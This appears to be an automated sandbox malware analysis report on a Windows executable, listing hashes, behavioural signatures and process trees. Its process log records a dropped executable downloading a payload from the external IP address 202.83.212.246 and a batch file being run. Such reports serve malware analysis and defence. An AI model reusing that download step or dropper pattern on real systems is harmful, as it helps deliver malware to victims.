Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 14:07
Behavioral task
behavioral1
Sample
0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
Resource
win10v2004-20240611-en
General
-
Target
0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
-
Size
99KB
-
MD5
0e5c05933631c0c1f9c54bb1c48e5686
-
SHA1
074b9aa3537864c3481ed9ea6029653c64472df6
-
SHA256
8d437724ac136ad89b3dfa89cefe077e9016cec59e4c6475a93bee3a419ff8f8
-
SHA512
94e91ae8eabe55616bebd2647004af8c041edb50c405a05a7c28900f93bb80dbd057961da1fb17b05f6330515888d8c55ea1885743b58f938942dca8146eac8d
-
SSDEEP
1536:EJlwldZwdjTEo9cfWxfxHm9tYLiNqEWINp3+erhRhggt7FZ4BUbqdj:EJlwmjTsfWpRktYLiNqEWarNggBFGNx
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2088 G1391-tmp.exe -
Loads dropped DLL 1 IoCs
pid Process 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 912 wrote to memory of 2088 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 28 PID 912 wrote to memory of 2088 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 28 PID 912 wrote to memory of 2088 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 28 PID 912 wrote to memory of 2088 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 28 PID 912 wrote to memory of 2992 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 30 PID 912 wrote to memory of 2992 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 30 PID 912 wrote to memory of 2992 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 30 PID 912 wrote to memory of 2992 912 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Users\Admin\AppData\Local\Temp\G1391-tmp.exeC:\Users\Admin\AppData\Local\Temp\G1391-tmp.exe http://202.83.212.246/drv32.data "C:\Users\Admin\AppData\Local\Temp\G13A2-tmp"2⤵
- Executes dropped EXE
PID:2088
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\tmp.bat" "2⤵PID:2992
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
126KB
MD56deab4d5857cab2db48fee1d928159a3
SHA17b2d3295df966047325d19d4ecb49cc146a523dc
SHA256a15c5f871a8c2fea715d646f397e142fbb20df4484a3c34f81e8ce8f458cd5cc
SHA512b021dcc580fcbb5065dfaa76de31d59ff978694901d1a0e9ae678e9950793d22211de9175d032544eb6dafc42a3f9791058aa72c32edf033a92d65d6990fcf04
-
Filesize
51B
MD57bf5edfd0ea421d8f898bf2375c77fb8
SHA195f45b04a6c811ee3e050adbca06f1c40546ca76
SHA2562e8a5b2f9068c05e7529c4eb914c386c966b6b5684cd158f26082a99bff8af70
SHA5126276d2d520b3cc2154ee9771cfd0452128cc5e4b041238daa6c78a77263f54045ab4f64158b9c3ba8025f328846191c7d3d0fc91b0a303c4956478b82cacff5d